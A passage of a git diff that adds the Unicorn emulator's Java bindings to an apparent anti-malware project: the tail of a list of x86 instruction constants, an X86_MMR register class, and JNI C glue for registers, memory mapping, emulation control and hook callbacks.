UC_X86_INS_VPXORD = 1239; + public static final int UC_X86_INS_VPXORQ = 1240; + public static final int UC_X86_INS_VPXOR = 1241; + public static final int UC_X86_INS_VRCP14PD = 1242; + public static final int UC_X86_INS_VRCP14PS = 1243; + public static final int UC_X86_INS_VRCP14SD = 1244; + public static final int UC_X86_INS_VRCP14SS = 1245; + public static final int UC_X86_INS_VRCP28PD = 1246; + public static final int UC_X86_INS_VRCP28PS = 1247; + public static final int UC_X86_INS_VRCP28SD = 1248; + public static final int UC_X86_INS_VRCP28SS = 1249; + public static final int UC_X86_INS_VRCPPS = 1250; + public static final int UC_X86_INS_VRCPSS = 1251; + public static final int UC_X86_INS_VRNDSCALEPD = 1252; + public static final int UC_X86_INS_VRNDSCALEPS = 1253; + public static final int UC_X86_INS_VRNDSCALESD = 1254; + public static final int UC_X86_INS_VRNDSCALESS = 1255; + public static final int UC_X86_INS_VROUNDPD = 1256; + public static final int UC_X86_INS_VROUNDPS = 1257; + 
public static final int UC_X86_INS_VROUNDSD = 1258; + public static final int UC_X86_INS_VROUNDSS = 1259; + public static final int UC_X86_INS_VRSQRT14PD = 1260; + public static final int UC_X86_INS_VRSQRT14PS = 1261; + public static final int UC_X86_INS_VRSQRT14SD = 1262; + public static final int UC_X86_INS_VRSQRT14SS = 1263; + public static final int UC_X86_INS_VRSQRT28PD = 1264; + public static final int UC_X86_INS_VRSQRT28PS = 1265; + public static final int UC_X86_INS_VRSQRT28SD = 1266; + public static final int UC_X86_INS_VRSQRT28SS = 1267; + public static final int UC_X86_INS_VRSQRTPS = 1268; + public static final int UC_X86_INS_VRSQRTSS = 1269; + public static final int UC_X86_INS_VSCATTERDPD = 1270; + public static final int UC_X86_INS_VSCATTERDPS = 1271; + public static final int UC_X86_INS_VSCATTERPF0DPD = 1272; + public static final int UC_X86_INS_VSCATTERPF0DPS = 1273; + public static final int UC_X86_INS_VSCATTERPF0QPD = 1274; + public static final int UC_X86_INS_VSCATTERPF0QPS = 1275; + public static final int UC_X86_INS_VSCATTERPF1DPD = 1276; + public static final int UC_X86_INS_VSCATTERPF1DPS = 1277; + public static final int UC_X86_INS_VSCATTERPF1QPD = 1278; + public static final int UC_X86_INS_VSCATTERPF1QPS = 1279; + public static final int UC_X86_INS_VSCATTERQPD = 1280; + public static final int UC_X86_INS_VSCATTERQPS = 1281; + public static final int UC_X86_INS_VSHUFPD = 1282; + public static final int UC_X86_INS_VSHUFPS = 1283; + public static final int UC_X86_INS_VSQRTPD = 1284; + public static final int UC_X86_INS_VSQRTPS = 1285; + public static final int UC_X86_INS_VSQRTSD = 1286; + public static final int UC_X86_INS_VSQRTSS = 1287; + public static final int UC_X86_INS_VSTMXCSR = 1288; + public static final int UC_X86_INS_VSUBPD = 1289; + public static final int UC_X86_INS_VSUBPS = 1290; + public static final int UC_X86_INS_VSUBSD = 1291; + public static final int UC_X86_INS_VSUBSS = 1292; + public static final int UC_X86_INS_VTESTPD = 
1293; + public static final int UC_X86_INS_VTESTPS = 1294; + public static final int UC_X86_INS_VUNPCKHPD = 1295; + public static final int UC_X86_INS_VUNPCKHPS = 1296; + public static final int UC_X86_INS_VUNPCKLPD = 1297; + public static final int UC_X86_INS_VUNPCKLPS = 1298; + public static final int UC_X86_INS_VZEROALL = 1299; + public static final int UC_X86_INS_VZEROUPPER = 1300; + public static final int UC_X86_INS_WAIT = 1301; + public static final int UC_X86_INS_WBINVD = 1302; + public static final int UC_X86_INS_WRFSBASE = 1303; + public static final int UC_X86_INS_WRGSBASE = 1304; + public static final int UC_X86_INS_WRMSR = 1305; + public static final int UC_X86_INS_XABORT = 1306; + public static final int UC_X86_INS_XACQUIRE = 1307; + public static final int UC_X86_INS_XBEGIN = 1308; + public static final int UC_X86_INS_XCHG = 1309; + public static final int UC_X86_INS_XCRYPTCBC = 1310; + public static final int UC_X86_INS_XCRYPTCFB = 1311; + public static final int UC_X86_INS_XCRYPTCTR = 1312; + public static final int UC_X86_INS_XCRYPTECB = 1313; + public static final int UC_X86_INS_XCRYPTOFB = 1314; + public static final int UC_X86_INS_XEND = 1315; + public static final int UC_X86_INS_XGETBV = 1316; + public static final int UC_X86_INS_XLATB = 1317; + public static final int UC_X86_INS_XRELEASE = 1318; + public static final int UC_X86_INS_XRSTOR = 1319; + public static final int UC_X86_INS_XRSTOR64 = 1320; + public static final int UC_X86_INS_XRSTORS = 1321; + public static final int UC_X86_INS_XRSTORS64 = 1322; + public static final int UC_X86_INS_XSAVE = 1323; + public static final int UC_X86_INS_XSAVE64 = 1324; + public static final int UC_X86_INS_XSAVEC = 1325; + public static final int UC_X86_INS_XSAVEC64 = 1326; + public static final int UC_X86_INS_XSAVEOPT = 1327; + public static final int UC_X86_INS_XSAVEOPT64 = 1328; + public static final int UC_X86_INS_XSAVES = 1329; + public static final int UC_X86_INS_XSAVES64 = 1330; + public static 
final int UC_X86_INS_XSETBV = 1331; + public static final int UC_X86_INS_XSHA1 = 1332; + public static final int UC_X86_INS_XSHA256 = 1333; + public static final int UC_X86_INS_XSTORE = 1334; + public static final int UC_X86_INS_XTEST = 1335; + public static final int UC_X86_INS_FDISI8087_NOP = 1336; + public static final int UC_X86_INS_FENI8087_NOP = 1337; + public static final int UC_X86_INS_ENDING = 1338; + +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/X86_MMR.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/X86_MMR.java new file mode 100644 index 0000000..1c3db2b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/X86_MMR.java @@ -0,0 +1,46 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2016 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
+ +*/ + +package unicorn; + +public class X86_MMR { + + public long base; + public int limit; + public int flags; + public short selector; + + public X86_MMR(long base, int limit, int flags, short selector) { + this.base = base; + this.limit = limit; + this.flags = flags; + this.selector = selector; + } + + public X86_MMR(long base, int limit) { + this.base = base; + this.limit = limit; + selector = 0; + flags = 0; + } + +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn_Unicorn.c b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn_Unicorn.c new file mode 100644 index 0000000..ccf335f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn_Unicorn.c @@ -0,0 +1,781 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
+ +*/ + +#include +#include "unicorn/platform.h" +#include +#include + +#include +#include +#include "unicorn_Unicorn.h" + +//cache jmethodID values as we look them up +static jmethodID invokeBlockCallbacks = 0; +static jmethodID invokeInterruptCallbacks = 0; +static jmethodID invokeCodeCallbacks = 0; + +static jmethodID invokeEventMemCallbacks = 0; +static jmethodID invokeReadCallbacks = 0; +static jmethodID invokeWriteCallbacks = 0; +static jmethodID invokeInCallbacks = 0; +static jmethodID invokeOutCallbacks = 0; +static jmethodID invokeSyscallCallbacks = 0; + +static JavaVM* cachedJVM; + +JNIEXPORT jint JNICALL JNI_OnLoad(JavaVM *jvm, void *reserved) { + cachedJVM = jvm; + return JNI_VERSION_1_6; +} + +// Callback function for tracing code (UC_HOOK_CODE & UC_HOOK_BLOCK) +// @address: address where the code is being executed +// @size: size of machine instruction being executed +// @user_data: user data passed to tracing APIs. +static void cb_hookcode(uc_engine *eng, uint64_t address, uint32_t size, void *user_data) { + JNIEnv *env; + (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); + jclass clz = (*env)->FindClass(env, "unicorn/Unicorn"); + if ((*env)->ExceptionCheck(env)) { + return; + } + (*env)->CallStaticVoidMethod(env, clz, invokeCodeCallbacks, (jlong)eng, (jlong)address, (int)size); + (*cachedJVM)->DetachCurrentThread(cachedJVM); +} + +// Callback function for tracing code (UC_HOOK_CODE & UC_HOOK_BLOCK) +// @address: address where the code is being executed +// @size: size of machine instruction being executed +// @user_data: user data passed to tracing APIs. 
+static void cb_hookblock(uc_engine *eng, uint64_t address, uint32_t size, void *user_data) { + JNIEnv *env; + (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); + jclass clz = (*env)->FindClass(env, "unicorn/Unicorn"); + if ((*env)->ExceptionCheck(env)) { + return; + } + (*env)->CallStaticVoidMethod(env, clz, invokeBlockCallbacks, (jlong)eng, (jlong)address, (int)size); + (*cachedJVM)->DetachCurrentThread(cachedJVM); +} + +// Callback function for tracing interrupts (for uc_hook_intr()) +// @intno: interrupt number +// @user_data: user data passed to tracing APIs. +static void cb_hookintr(uc_engine *eng, uint32_t intno, void *user_data) { + JNIEnv *env; + (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); + jclass clz = (*env)->FindClass(env, "unicorn/Unicorn"); + if ((*env)->ExceptionCheck(env)) { + return; + } + (*env)->CallStaticVoidMethod(env, clz, invokeInterruptCallbacks, (jlong)eng, (int)intno); + (*cachedJVM)->DetachCurrentThread(cachedJVM); +} + +// Callback function for tracing IN instruction of X86 +// @port: port number +// @size: data size (1/2/4) to be read from this port +// @user_data: user data passed to tracing APIs. 
+static uint32_t cb_insn_in(uc_engine *eng, uint32_t port, int size, void *user_data) { + JNIEnv *env; + uint32_t res = 0; + (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); + jclass clz = (*env)->FindClass(env, "unicorn/Unicorn"); + if ((*env)->ExceptionCheck(env)) { + return 0; + } + res = (uint32_t)(*env)->CallStaticIntMethod(env, clz, invokeInCallbacks, (jlong)eng, (jint)port, (jint)size); + (*cachedJVM)->DetachCurrentThread(cachedJVM); + return res; +} + +// x86's handler for OUT +// @port: port number +// @size: data size (1/2/4) to be written to this port +// @value: data value to be written to this port +static void cb_insn_out(uc_engine *eng, uint32_t port, int size, uint32_t value, void *user_data) { + JNIEnv *env; + (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); + jclass clz = (*env)->FindClass(env, "unicorn/Unicorn"); + if ((*env)->ExceptionCheck(env)) { + return; + } + (*env)->CallStaticVoidMethod(env, clz, invokeOutCallbacks, (jlong)eng, (jint)port, (jint)size, (jint)value); + (*cachedJVM)->DetachCurrentThread(cachedJVM); +} + +// x86's handler for SYSCALL/SYSENTER +static void cb_insn_syscall(uc_engine *eng, void *user_data) { + JNIEnv *env; + (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); + jclass clz = (*env)->FindClass(env, "unicorn/Unicorn"); + if ((*env)->ExceptionCheck(env)) { + return; + } + (*env)->CallStaticVoidMethod(env, clz, invokeSyscallCallbacks, (jlong)eng); + (*cachedJVM)->DetachCurrentThread(cachedJVM); +} + +// Callback function for hooking memory (UC_HOOK_MEM_*) +// @type: this memory is being READ, or WRITE +// @address: address where the code is being executed +// @size: size of data being read or written +// @value: value of data being written to memory, or irrelevant if type = READ. 
+// @user_data: user data passed to tracing APIs +static void cb_hookmem(uc_engine *eng, uc_mem_type type, + uint64_t address, int size, int64_t value, void *user_data) { + JNIEnv *env; + (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); + jclass clz = (*env)->FindClass(env, "unicorn/Unicorn"); + if ((*env)->ExceptionCheck(env)) { + return; + } + switch (type) { + case UC_MEM_READ: + (*env)->CallStaticVoidMethod(env, clz, invokeReadCallbacks, (jlong)eng, (jlong)address, (int)size); + break; + case UC_MEM_WRITE: + (*env)->CallStaticVoidMethod(env, clz, invokeWriteCallbacks, (jlong)eng, (jlong)address, (int)size, (jlong)value); + break; + } + (*cachedJVM)->DetachCurrentThread(cachedJVM); +} + +// Callback function for handling memory events (for UC_HOOK_MEM_UNMAPPED) +// @type: this memory is being READ, or WRITE +// @address: address where the code is being executed +// @size: size of data being read or written +// @value: value of data being written to memory, or irrelevant if type = READ. +// @user_data: user data passed to tracing APIs +// @return: return true to continue, or false to stop program (due to invalid memory). 
+static bool cb_eventmem(uc_engine *eng, uc_mem_type type, + uint64_t address, int size, int64_t value, void *user_data) { + JNIEnv *env; + (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); + jclass clz = (*env)->FindClass(env, "unicorn/Unicorn"); + if ((*env)->ExceptionCheck(env)) { + return false; + } + jboolean res = (*env)->CallStaticBooleanMethod(env, clz, invokeEventMemCallbacks, (jlong)eng, (int)type, (jlong)address, (int)size, (jlong)value); + (*cachedJVM)->DetachCurrentThread(cachedJVM); + return res; +} + +static void throwException(JNIEnv *env, uc_err err) { + //throw exception + jclass clazz = (*env)->FindClass(env, "unicorn/UnicornException"); + if (err != UC_ERR_OK) { + const char *msg = uc_strerror(err); + (*env)->ThrowNew(env, clazz, msg); + } +} + +static uc_engine *getEngine(JNIEnv *env, jobject self) { + static int haveFid = 0; + static jfieldID fid; + if (haveFid == 0) { + //cache the field id + jclass clazz = (*env)->GetObjectClass(env, self); + fid = (*env)->GetFieldID(env, clazz, "eng", "J"); + haveFid = 1; + } + return (uc_engine *)(*env)->GetLongField(env, self, fid); +} + +/* + * Class: unicorn_Unicorn + * Method: reg_write_num + * Signature: (ILjava/lang/Number;)V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_reg_1write_1num + (JNIEnv *env, jobject self, jint regid, jobject value) { + uc_engine *eng = getEngine(env, self); + + jclass clz = (*env)->FindClass(env, "java/lang/Number"); + if ((*env)->ExceptionCheck(env)) { + return; + } + + jmethodID longValue = (*env)->GetMethodID(env, clz, "longValue", "()J"); + jlong longVal = (*env)->CallLongMethod(env, value, longValue); + uc_err err = uc_reg_write(eng, regid, &longVal); + if (err != UC_ERR_OK) { + throwException(env, err); + } +} + +/* + * Class: unicorn_Unicorn + * Method: reg_write_mmr + * Signature: (ILunicorn/X86_MMR;)V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_reg_1write_1mmr + (JNIEnv *env, jobject self, jint regid, jobject value) { + uc_engine *eng = 
getEngine(env, self); + uc_x86_mmr mmr; + + jclass clz = (*env)->FindClass(env, "unicorn/X86_MMR"); + if ((*env)->ExceptionCheck(env)) { + return; + } + + jfieldID fid = (*env)->GetFieldID(env, clz, "base", "J"); + mmr.base = (uint64_t)(*env)->GetLongField(env, value, fid); + + fid = (*env)->GetFieldID(env, clz, "limit", "I"); + mmr.limit = (uint32_t)(*env)->GetLongField(env, value, fid); + + fid = (*env)->GetFieldID(env, clz, "flags", "I"); + mmr.flags = (uint32_t)(*env)->GetLongField(env, value, fid); + + fid = (*env)->GetFieldID(env, clz, "selector", "S"); + mmr.selector = (uint16_t)(*env)->GetLongField(env, value, fid); + + uc_err err = uc_reg_write(eng, regid, &mmr); + if (err != UC_ERR_OK) { + throwException(env, err); + } +} + +/* + * Class: unicorn_Unicorn + * Method: reg_read_num + * Signature: (I)Ljava/lang/Number; + */ +JNIEXPORT jobject JNICALL Java_unicorn_Unicorn_reg_1read_1num + (JNIEnv *env, jobject self, jint regid) { + uc_engine *eng = getEngine(env, self); + + jclass clz = (*env)->FindClass(env, "java/lang/Long"); + if ((*env)->ExceptionCheck(env)) { + return NULL; + } + + jlong longVal; + uc_err err = uc_reg_read(eng, regid, &longVal); + if (err != UC_ERR_OK) { + throwException(env, err); + } + + jmethodID cons = (*env)->GetMethodID(env, clz, "", "(J)V"); + jobject result = (*env)->NewObject(env, clz, cons, longVal); + if ((*env)->ExceptionCheck(env)) { + return NULL; + } + return result; +} + +/* + * Class: unicorn_Unicorn + * Method: reg_read_mmr + * Signature: (I)Ljava/lang/Number; + */ +JNIEXPORT jobject JNICALL Java_unicorn_Unicorn_reg_1read_1mmr + (JNIEnv *env, jobject self, jint regid) { + uc_engine *eng = getEngine(env, self); + + jclass clz = (*env)->FindClass(env, "unicorn/X86_MMR"); + if ((*env)->ExceptionCheck(env)) { + return NULL; + } + + uc_x86_mmr mmr; + uc_err err = uc_reg_read(eng, regid, &mmr); + if (err != UC_ERR_OK) { + throwException(env, err); + } + + jmethodID cons = (*env)->GetMethodID(env, clz, "", "(JIIS)V"); + jobject 
result = (*env)->NewObject(env, clz, cons, mmr.base, mmr.limit, mmr.flags, mmr.selector); + if ((*env)->ExceptionCheck(env)) { + return NULL; + } + return result; +} + +/* + * Class: unicorn_Unicorn + * Method: open + * Signature: (II)J + */ +JNIEXPORT jlong JNICALL Java_unicorn_Unicorn_open + (JNIEnv *env, jobject self, jint arch, jint mode) { + uc_engine *eng = NULL; + uc_err err = uc_open((uc_arch)arch, (uc_mode)mode, &eng); + if (err != UC_ERR_OK) { + throwException(env, err); + } + return (jlong)eng; +} + +/* + * Class: unicorn_Unicorn + * Method: version + * Signature: ()I + */ +JNIEXPORT jint JNICALL Java_unicorn_Unicorn_version + (JNIEnv *env, jclass clz) { + return (jint)uc_version(NULL, NULL); +} + +/* + * Class: unicorn_Unicorn + * Method: arch_supported + * Signature: (I)Z + */ +JNIEXPORT jboolean JNICALL Java_unicorn_Unicorn_arch_1supported + (JNIEnv *env, jclass clz, jint arch) { + return (jboolean)(uc_arch_supported((uc_arch)arch) != 0); +} + +/* + * Class: unicorn_Unicorn + * Method: close + * Signature: ()V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_close + (JNIEnv *env, jobject self) { + uc_engine *eng = getEngine(env, self); + uc_err err = uc_close(eng); + if (err != UC_ERR_OK) { + throwException(env, err); + } + //We also need to ReleaseByteArrayElements for any regions that + //were mapped with uc_mem_map_ptr +} + +/* + * Class: unicorn_Unicorn + * Method: query + * Signature: (I)I + */ +JNIEXPORT jint JNICALL Java_unicorn_Unicorn_query + (JNIEnv *env, jobject self, jint type) { + uc_engine *eng = getEngine(env, self); + size_t result; + uc_err err = uc_query(eng, type, &result); + if (err != UC_ERR_OK) { + throwException(env, err); + } + return (jint)result; +} + +/* + * Class: unicorn_Unicorn + * Method: errno + * Signature: ()I + */ +JNIEXPORT jint JNICALL Java_unicorn_Unicorn_errno + (JNIEnv *env, jobject self) { + uc_engine *eng = getEngine(env, self); + return (jint)uc_errno(eng); +} + +/* + * Class: unicorn_Unicorn + * Method: 
strerror + * Signature: (I)Ljava/lang/String; + */ +JNIEXPORT jstring JNICALL Java_unicorn_Unicorn_strerror + (JNIEnv *env, jclass clz, jint code) { + const char *err = uc_strerror((int)code); + jstring s = (*env)->NewStringUTF(env, err); + return s; +} + +/* + * Class: unicorn_Unicorn + * Method: reg_write + * Signature: (I[B)V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_reg_1write + (JNIEnv *env, jobject self, jint regid, jbyteArray value) { + uc_engine *eng = getEngine(env, self); + jbyte *array = (*env)->GetByteArrayElements(env, value, NULL); + uc_err err = uc_reg_write(eng, (int)regid, (void *)array); + if (err != UC_ERR_OK) { + throwException(env, err); + } + (*env)->ReleaseByteArrayElements(env, value, array, JNI_ABORT); +} + +/* + * Class: unicorn_Unicorn + * Method: reg_read + * Signature: (II)[B + */ +JNIEXPORT jbyteArray JNICALL Java_unicorn_Unicorn_reg_1read + (JNIEnv *env, jobject self, jint regid, jint regsz) { + uc_engine *eng = getEngine(env, self); + jbyteArray regval = (*env)->NewByteArray(env, (jsize)regsz); + jbyte *array = (*env)->GetByteArrayElements(env, regval, NULL); + uc_err err = uc_reg_read(eng, (int)regid, (void *)array); + if (err != UC_ERR_OK) { + throwException(env, err); + } + (*env)->ReleaseByteArrayElements(env, regval, array, 0); + return regval; +} + +/* + * Class: unicorn_Unicorn + * Method: mem_write + * Signature: (J[B)V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_mem_1write + (JNIEnv *env , jobject self, jlong address, jbyteArray bytes) { + + uc_engine *eng = getEngine(env, self); + jbyte *array = (*env)->GetByteArrayElements(env, bytes, NULL); + jsize size = (*env)->GetArrayLength(env, bytes); + uc_err err = uc_mem_write(eng, (uint64_t)address, array, (size_t)size); + + if (err != UC_ERR_OK) { + throwException(env, err); + } + + (*env)->ReleaseByteArrayElements(env, bytes, array, JNI_ABORT); +} + +/* + * Class: unicorn_Unicorn + * Method: mem_read + * Signature: (JJ)[B + */ +JNIEXPORT jbyteArray JNICALL 
Java_unicorn_Unicorn_mem_1read + (JNIEnv *env, jobject self, jlong address, jlong size) { + uc_engine *eng = getEngine(env, self); + + jbyteArray bytes = (*env)->NewByteArray(env, (jsize)size); + jbyte *array = (*env)->GetByteArrayElements(env, bytes, NULL); + uc_err err = uc_mem_read(eng, (uint64_t)address, array, (size_t)size); + if (err != UC_ERR_OK) { + throwException(env, err); + } + (*env)->ReleaseByteArrayElements(env, bytes, array, 0); + return bytes; +} + +/* + * Class: unicorn_Unicorn + * Method: emu_start + * Signature: (JJJJ)V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_emu_1start + (JNIEnv *env, jobject self, jlong begin, jlong until, jlong timeout, jlong count) { + uc_engine *eng = getEngine(env, self); + + uc_err err = uc_emu_start(eng, (uint64_t)begin, (uint64_t)until, (uint64_t)timeout, (size_t)count); + if (err != UC_ERR_OK) { + throwException(env, err); + } +} + +/* + * Class: unicorn_Unicorn + * Method: emu_stop + * Signature: ()V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_emu_1stop + (JNIEnv *env, jobject self) { + uc_engine *eng = getEngine(env, self); + + uc_err err = uc_emu_stop(eng); + if (err != UC_ERR_OK) { + throwException(env, err); + } +} + +/* + * Class: unicorn_Unicorn + * Method: registerHook + * Signature: (JI)J + */ +JNIEXPORT jlong JNICALL Java_unicorn_Unicorn_registerHook__JI + (JNIEnv *env, jclass clz, jlong eng, jint type) { + uc_hook hh = 0; + uc_err err = 0; + switch (type) { + case UC_HOOK_INTR: // Hook all interrupt events + if (invokeInterruptCallbacks == 0) { + invokeInterruptCallbacks = (*env)->GetStaticMethodID(env, clz, "invokeInterruptCallbacks", "(JI)V"); + } + err = uc_hook_add((uc_engine*)eng, &hh, (uc_hook_type)type, cb_hookintr, env, 1, 0); + break; + case UC_HOOK_MEM_FETCH_UNMAPPED: // Hook for all invalid memory access events + case UC_HOOK_MEM_READ_UNMAPPED: // Hook for all invalid memory access events + case UC_HOOK_MEM_WRITE_UNMAPPED: // Hook for all invalid memory access events + case 
UC_HOOK_MEM_FETCH_PROT: // Hook for all invalid memory access events + case UC_HOOK_MEM_READ_PROT: // Hook for all invalid memory access events + case UC_HOOK_MEM_WRITE_PROT: // Hook for all invalid memory access events + if (invokeEventMemCallbacks == 0) { + invokeEventMemCallbacks = (*env)->GetStaticMethodID(env, clz, "invokeEventMemCallbacks", "(JIJIJ)Z"); + } + err = uc_hook_add((uc_engine*)eng, &hh, (uc_hook_type)type, cb_eventmem, env, 1, 0); + break; + } + return (jlong)hh; +} + +/* + * Class: unicorn_Unicorn + * Method: registerHook + * Signature: (JII)J + */ +JNIEXPORT jlong JNICALL Java_unicorn_Unicorn_registerHook__JII + (JNIEnv *env, jclass clz, jlong eng, jint type, jint arg1) { + uc_hook hh = 0; + uc_err err = 0; + switch (type) { + case UC_HOOK_INSN: // Hook a particular instruction + switch (arg1) { + case UC_X86_INS_OUT: + if (invokeOutCallbacks == 0) { + invokeOutCallbacks = (*env)->GetStaticMethodID(env, clz, "invokeOutCallbacks", "(JIII)V"); + } + err = uc_hook_add((uc_engine*)eng, &hh, (uc_hook_type)type, cb_insn_out, env, 1, 0, arg1); + case UC_X86_INS_IN: + if (invokeInCallbacks == 0) { + invokeInCallbacks = (*env)->GetStaticMethodID(env, clz, "invokeInCallbacks", "(JII)I"); + } + err = uc_hook_add((uc_engine*)eng, &hh, (uc_hook_type)type, cb_insn_in, env, 1, 0, arg1); + case UC_X86_INS_SYSENTER: + case UC_X86_INS_SYSCALL: + if (invokeSyscallCallbacks == 0) { + invokeSyscallCallbacks = (*env)->GetStaticMethodID(env, clz, "invokeSyscallCallbacks", "(J)V"); + } + err = uc_hook_add((uc_engine*)eng, &hh, (uc_hook_type)type, cb_insn_syscall, env, 1, 0, arg1); + } + break; + } + return (jlong)hh; +} + +/* + * Class: unicorn_Unicorn + * Method: registerHook + * Signature: (JIJJ)J + */ +JNIEXPORT jlong JNICALL Java_unicorn_Unicorn_registerHook__JIJJ + (JNIEnv *env, jclass clz, jlong eng, jint type, jlong arg1, jlong arg2) { + uc_hook hh = 0; + uc_err err = 0; + switch (type) { + case UC_HOOK_CODE: // Hook a range of code + if (invokeCodeCallbacks == 
0) { + invokeCodeCallbacks = (*env)->GetStaticMethodID(env, clz, "invokeCodeCallbacks", "(JJI)V"); + } + err = uc_hook_add((uc_engine*)eng, &hh, (uc_hook_type)type, cb_hookcode, env, 1, 0, arg1, arg2); + break; + case UC_HOOK_BLOCK: // Hook basic blocks + if (invokeBlockCallbacks == 0) { + invokeBlockCallbacks = (*env)->GetStaticMethodID(env, clz, "invokeBlockCallbacks", "(JJI)V"); + } + err = uc_hook_add((uc_engine*)eng, &hh, (uc_hook_type)type, cb_hookblock, env, 1, 0, arg1, arg2); + break; + case UC_HOOK_MEM_READ: // Hook all memory read events. + if (invokeReadCallbacks == 0) { + invokeReadCallbacks = (*env)->GetStaticMethodID(env, clz, "invokeReadCallbacks", "(JJI)V"); + } + err = uc_hook_add((uc_engine*)eng, &hh, (uc_hook_type)type, cb_hookmem, env, 1, 0, arg1, arg2); + break; + case UC_HOOK_MEM_WRITE: // Hook all memory write events. + if (invokeWriteCallbacks == 0) { + invokeWriteCallbacks = (*env)->GetStaticMethodID(env, clz, "invokeWriteCallbacks", "(JJIJ)V"); + } + err = uc_hook_add((uc_engine*)eng, &hh, (uc_hook_type)type, cb_hookmem, env, 1, 0, arg1, arg2); + break; + } + return (jlong)hh; +} + +/* + * Class: unicorn_Unicorn + * Method: hook_del + * Signature: (J)V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_hook_1del + (JNIEnv *env, jobject self, jlong hh) { + uc_engine *eng = getEngine(env, self); + + //**** TODO remove hook from any internal hook tables as well + + uc_err err = uc_hook_del(eng, (uc_hook)hh); + if (err != UC_ERR_OK) { + throwException(env, err); + } +} + +/* + * Class: unicorn_Unicorn + * Method: mem_map + * Signature: (JJI)V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_mem_1map + (JNIEnv *env, jobject self, jlong address, jlong size, jint perms) { + uc_engine *eng = getEngine(env, self); + + uc_err err = uc_mem_map(eng, (uint64_t)address, (size_t)size, (uint32_t)perms); + if (err != UC_ERR_OK) { + throwException(env, err); + } +} + +/* + * Class: unicorn_Unicorn + * Method: mem_map_ptr + * Signature: (JJI[B)V + */ 
+JNIEXPORT void JNICALL Java_unicorn_Unicorn_mem_1map_1ptr + (JNIEnv *env, jobject self, jlong address, jlong size, jint perms, jbyteArray block) { + uc_engine *eng = getEngine(env, self); + jbyte *array = (*env)->GetByteArrayElements(env, block, NULL); + uc_err err = uc_mem_map_ptr(eng, (uint64_t)address, (size_t)size, (uint32_t)perms, (void*)array); + if (err != UC_ERR_OK) { + throwException(env, err); + } + //Need to track address/block/array so that we can ReleaseByteArrayElements when the + //block gets unmapped or when uc_close gets called + //(*env)->ReleaseByteArrayElements(env, block, array, JNI_ABORT); +} + +/* + * Class: unicorn_Unicorn + * Method: mem_unmap + * Signature: (JJ)V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_mem_1unmap + (JNIEnv *env, jobject self, jlong address, jlong size) { + uc_engine *eng = getEngine(env, self); + + uc_err err = uc_mem_unmap(eng, (uint64_t)address, (size_t)size); + if (err != UC_ERR_OK) { + throwException(env, err); + } + + //If a region was mapped using uc_mem_map_ptr, we also need to + //ReleaseByteArrayElements for that region +} + +/* + * Class: unicorn_Unicorn + * Method: mem_protect + * Signature: (JJI)V + */ +JNIEXPORT void JNICALL Java_unicorn_Unicorn_mem_1protect + (JNIEnv *env, jobject self, jlong address, jlong size, jint perms) { + uc_engine *eng = getEngine(env, self); + + uc_err err = uc_mem_protect(eng, (uint64_t)address, (size_t)size, (uint32_t)perms); + if (err != UC_ERR_OK) { + throwException(env, err); + } +} + +/* + * Class: unicorn_Unicorn + * Method: mem_regions + * Signature: ()[Lunicorn/MemRegion; + */ +JNIEXPORT jobjectArray JNICALL Java_unicorn_Unicorn_mem_1regions + (JNIEnv *env, jobject self) { + uc_engine *eng = getEngine(env, self); + + uc_mem_region *regions = NULL; + uint32_t count = 0; + uint32_t i; + + uc_err err = uc_mem_regions(eng, &regions, &count); /* fixed mojibake: "&reg" of "&regions" had been converted to the entity character '®' */ + if (err != UC_ERR_OK) { + throwException(env, err); + } + jclass clz = (*env)->FindClass(env, "unicorn/MemRegion"); + if 
